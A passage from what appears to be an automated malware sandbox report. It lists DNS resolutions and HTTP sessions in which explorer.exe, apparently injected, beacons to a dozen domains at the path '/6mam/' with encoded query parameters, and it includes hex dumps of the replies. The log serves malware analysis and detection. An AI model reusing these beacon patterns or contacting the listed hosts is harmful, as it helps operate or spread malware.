                                                                                Aug 3, 2021 16:18:17.888134956 CEST8.8.8.8192.168.2.60x6d96No error (0)schoolfrontoffice.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:23.075978994 CEST8.8.8.8192.168.2.60xc142No error (0)www.mypursuitpodcast.commypursuitpodcast.comCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:18:23.075978994 CEST8.8.8.8192.168.2.60xc142No error (0)mypursuitpodcast.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:28.356432915 CEST8.8.8.8192.168.2.60x5b26No error (0)www.besport24.combesport24.comCNAME (Canonical name)IN (0x0001)
                                                                                Aug 3, 2021 16:18:28.356432915 CEST8.8.8.8192.168.2.60x5b26No error (0)besport24.com51.83.52.226A (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:33.597852945 CEST8.8.8.8192.168.2.60xee58Server failure (2)www.opticatervisof.comnonenoneA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:18:53.953155041 CEST8.8.8.8192.168.2.60xe37bName error (3)www.titanusedcarsworth.comnonenoneA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:19:24.063231945 CEST8.8.8.8192.168.2.60x8800Server failure (2)www.f9fui8.xyznonenoneA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:19:24.145198107 CEST8.8.8.8192.168.2.60x8800Server failure (2)www.f9fui8.xyznonenoneA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:19:24.337505102 CEST8.8.8.8192.168.2.60x8800Server failure (2)www.f9fui8.xyznonenoneA (IP address)IN (0x0001)
                                                                                Aug 3, 2021 16:19:27.819940090 CEST8.8.8.8192.168.2.60x8800Server failure (2)www.f9fui8.xyznonenoneA (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • www.mobiessence.com
                                                                                • www.trendyheld.com
                                                                                • www.beastninjas.com
                                                                                • www.importexportasia.com
                                                                                • www.kilbyrnefarm.com
                                                                                • www.dragonshipping.com
                                                                                • www.mylifeinpark.com
                                                                                • www.delhibudokankarate.com
                                                                                • www.vavasoo.com
                                                                                • www.schoolfrontoffice.com
                                                                                • www.mypursuitpodcast.com
                                                                                • www.besport24.com

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.64975752.58.78.1680C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:17:10.204705954 CEST6871OUTGET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.mobiessence.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:10.226708889 CEST6872INHTTP/1.1 410 Gone
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:17:02 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 65 73 73 65 6e 63 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 62 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 65 73 73 65 6e 63 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 7<html>9 <head>4f <meta http-equiv='refresh' content='5; url=http://www.mobiessence.com/' />a </head>9 <body>3b You are being redirected to http://www.mobiessence.coma </body>8</html>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.64975823.227.38.7480C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:17:15.323340893 CEST6873OUTGET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.trendyheld.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:15.387608051 CEST6874INHTTP/1.1 403 Forbidden
                                                                                Date: Tue, 03 Aug 2021 14:17:15 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Sorting-Hat-PodId: -1
                                                                                X-Request-ID: db62f90e-a4d5-4a11-a9b8-e1eaba5a047f
                                                                                X-Download-Options: noopen
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-Dc: gcp-europe-west1
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Server: cloudflare
                                                                                CF-RAY: 67902b1edb760629-FRA
                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73
                                                                                Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                10192.168.2.64976734.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:18:23.096551895 CEST6892OUTGET /6mam/?wbYpSP=U4etKMGlduRHKY34/y2VHJ3U/bl1CG9JeeGxs20P+eoGUQdkn77fFsSN2SlAgFKwyO8ri7IQTA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.mypursuitpodcast.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:23.209711075 CEST6892INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:18:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "6104831f-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                11192.168.2.64976851.83.52.22680C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:18:28.383270979 CEST6893OUTGET /6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.besport24.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:28.408617020 CEST6894INHTTP/1.1 301 Moved Permanently
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Content-Length: 707
                                                                                Date: Tue, 03 Aug 2021 14:18:28 GMT
                                                                                Location: https://www.besport24.com/6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                12192.168.2.64976952.58.78.1680C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:18:38.628000021 CEST6895OUTGET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.mobiessence.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:38.645533085 CEST6896INHTTP/1.1 410 Gone
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:18:31 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 65 73 73 65 6e 63 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 62 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 65 73 73 65 6e 63 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 7<html>9 <head>4f <meta http-equiv='refresh' content='5; url=http://www.mobiessence.com/' />a </head>9 <body>3b You are being redirected to http://www.mobiessence.coma </body>8</html>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                13192.168.2.64977023.227.38.7480C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:18:43.672755957 CEST6896OUTGET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.trendyheld.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:43.720793009 CEST6898INHTTP/1.1 403 Forbidden
                                                                                Date: Tue, 03 Aug 2021 14:18:43 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Sorting-Hat-PodId: -1
                                                                                X-Dc: gcp-europe-west1
                                                                                X-Request-ID: 8fc68041-0d89-4d7e-9e16-7e594a52de97
                                                                                X-Download-Options: noopen
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                X-XSS-Protection: 1; mode=block
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Server: cloudflare
                                                                                CF-RAY: 67902d46fc2c4414-FRA
                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73
                                                                                Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                14192.168.2.64977134.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:18:48.757162094 CEST6903OUTGET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.beastninjas.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:48.870419979 CEST6903INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:18:48 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "6104831f-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                15192.168.2.64977223.27.129.11580C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:18:59.144073963 CEST6904OUTGET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.importexportasia.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:59.358800888 CEST6905INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 03 Aug 2021 14:19:25 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/5.4.41
